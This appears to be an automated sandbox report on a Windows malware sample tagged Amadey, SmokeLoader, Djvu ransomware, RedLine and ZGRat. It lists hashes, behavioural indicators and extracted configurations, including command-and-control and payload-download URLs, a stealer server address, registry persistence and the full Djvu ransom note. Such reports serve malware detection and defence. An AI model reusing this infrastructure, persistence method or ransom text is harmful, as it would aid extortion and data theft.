amadey | b6d7d2ab6d7e66ba154aac8266fd5e0f6667c11d3cc682b241da586a5577581a

Analysis

max time kernel
101s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
23-01-2024 16:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

222KB
MD5

11ac7990dacb8fed9a583f69660a8310
SHA1

a891612189e2db49a16704a9ac08850c5a76be3d
SHA256

b6d7d2ab6d7e66ba154aac8266fd5e0f6667c11d3cc682b241da586a5577581a
SHA512

7613b538549467fb21b3d3a4c25c82a6ab44a384b832efc6cd420b32083bf81e4563f4e558cf316532cc7d8fed68f5d232c9bfeb4335230e8c6db20c036a20d5
SSDEEP

3072:yKSFP/aG5wOG9vlyLfniPI4JSzjEz5MXzHuSgAChOrFgjaaSpGq/B:y5FPyrs/iKzeMXPVh9p7

Score

10^/10

amadey djvu redline smokeloader zgrat logsdiller cloud (tg: @logsdillabot)pub1 backdoor discovery infostealer persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Version

2022

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32

Extracted

Family

djvu

http://habrafa.com/test1/get.php

Attributes

extension
.cdpo
offline_id
Bn3q97hwLouKbhkQRNO4SeV07gjdEQVm8NKhg0t1
payload_url
http://brusuax.com/dl/build2.exe

http://habrafa.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-FCWSCsjEWS Price of private key and decrypt software is $1999. Discount 50% available if you contact us first 72 hours, that's price for you is $999. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0844OSkw

rsa_pubkey.plain

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

45.15.156.60:12050

Extracted

Family

amadey

Version

4.17

http://185.196.10.34

Attributes

install_dir
eff1401c19
install_file
Dctooux.exe
strings_key
6e23b5eadc27bb0b2eaebdd4fed1beb2
url_paths
/b8sdjsdkS/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 23 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4284-103-0x0000000004F10000-0x0000000004FDA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-105-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-104-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-107-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-109-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-111-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-113-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-123-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-125-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-121-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-119-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-117-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-115-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-127-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-129-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-131-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-135-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-133-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-137-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-139-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/4284-141-0x0000000004F10000-0x0000000004FD3000-memory.dmp	family_zgrat_v1
behavioral2/memory/3476-2162-0x00000264EE960000-0x00000264EEA9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/3820-3106-0x000001F97F8B0000-0x000001F97F9B2000-memory.dmp	family_zgrat_v1

Detected Djvu ransomware 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/404-28-0x0000000002190000-0x00000000022AB000-memory.dmp	family_djvu
behavioral2/memory/3776-29-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3776-31-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3776-32-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3776-33-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3776-43-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/948-49-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/948-50-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/948-52-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5080-47-0x00000000005F0000-0x000000000068D000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3796-72-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Modifies Installed Components in the registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

C600.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation C600.exe
Deletes itself 1 IoCs

Processes:

pid process

3488
Executes dropped EXE 10 IoCs

Processes:

AA98.exeC600.exeC600.exeC600.exeC600.exeD738.exeF408.exe4C5A.exe4C5A.exe4C5A.exe

pid process

1800 AA98.exe
404 C600.exe
3776 C600.exe
5080 C600.exe
948 C600.exe
2400 D738.exe
4616 F408.exe
4284 4C5A.exe
4012 4C5A.exe
1184 4C5A.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

3352 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	C600.exe

pid	process
3488

pid	process
1800	AA98.exe
404	C600.exe
3776	C600.exe
5080	C600.exe
948	C600.exe
2400	D738.exe
4616	F408.exe
4284	4C5A.exe
4012	4C5A.exe
1184	4C5A.exe

pid	process
3352	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

C600.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e413230b-f7c4-4632-89d9-5d59f67772cc\\C600.exe\" --AutoStart"	C600.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 12 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

explorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exe

description	ioc	process
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 api.2ip.ua
30 api.2ip.ua

flow	ioc
29	api.2ip.ua
30	api.2ip.ua

Suspicious use of SetThreadContext 4 IoCs

Processes:

C600.exeC600.exeF408.exe4C5A.exe

description	pid	process	target process
PID 404 set thread context of 3776	404	C600.exe	C600.exe
PID 5080 set thread context of 948	5080	C600.exe	C600.exe
PID 4616 set thread context of 3796	4616	F408.exe	RegAsm.exe
PID 4284 set thread context of 1184	4284	4C5A.exe	4C5A.exe

Drops file in Windows directory 1 IoCs

Processes:

4C5A.exe

description ioc process

File created C:\Windows\Tasks\Dctooux.job 4C5A.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

516 948 WerFault.exe C600.exe

description	ioc	process
File created	C:\Windows\Tasks\Dctooux.job	4C5A.exe

pid	pid_target	process	target process
516	948	WerFault.exe	C600.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

explorer.exeexplorer.exeexplorer.exeAA98.exeexplorer.exeexplorer.exefile.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AA98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

T1112

Processes:

SearchApp.exeSearchApp.exeSearchApp.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe

Modifies registry class 64 IoCs

Processes:

StartMenuExperienceHost.exeSearchApp.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeStartMenuExperienceHost.exeSearchApp.exeSearchApp.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3803511929-1339359695-2191195476-1000\{F1A22816-7772-4806-A738-190E8BC2B9DC}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
